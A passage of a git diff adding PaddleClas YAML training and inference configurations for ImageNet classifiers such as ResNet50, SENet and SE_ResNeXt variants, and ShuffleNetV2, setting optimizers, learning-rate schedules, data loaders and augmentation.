DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml new file mode 100644 index 0000000..59d4bce --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml @@ -0,0 +1,148 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + image_channel: &image_channel 4 + # used for static mode and model export + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + use_dali: True + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: &use_pure_fp16 False + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 
+ input_image_channel: *image_channel + data_format: "NHWC" + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - 
ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml new file mode 100644 index 0000000..ba38350 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml new file mode 100644 index 0000000..f8255a9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SENet154_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml new file mode 100644 index 0000000..bf27461 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: 
True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt101_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 
0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml new file mode 100644 index 0000000..5408586 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml @@ -0,0 +1,140 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_channel: &image_channel 4 + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt101_32x4d + class_num: 1000 + input_image_channel: *image_channel + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: &use_pure_fp16 True + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + 
drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: BatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml new file mode 100644 index 0000000..2c12869 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt50_32x4d + class_num: 1000 + +# loss function 
config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml new file mode 100644 index 0000000..48e6e42 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt50_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: 
DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml new file mode 100644 index 0000000..20b3a0c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet18_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 
0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml new file mode 100644 index 0000000..7280e32 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet34_vd + class_num: 
1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml new file mode 100644 index 0000000..030dff9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet50_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 
0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml new file mode 100644 index 0000000..79bb34e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_swish + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: 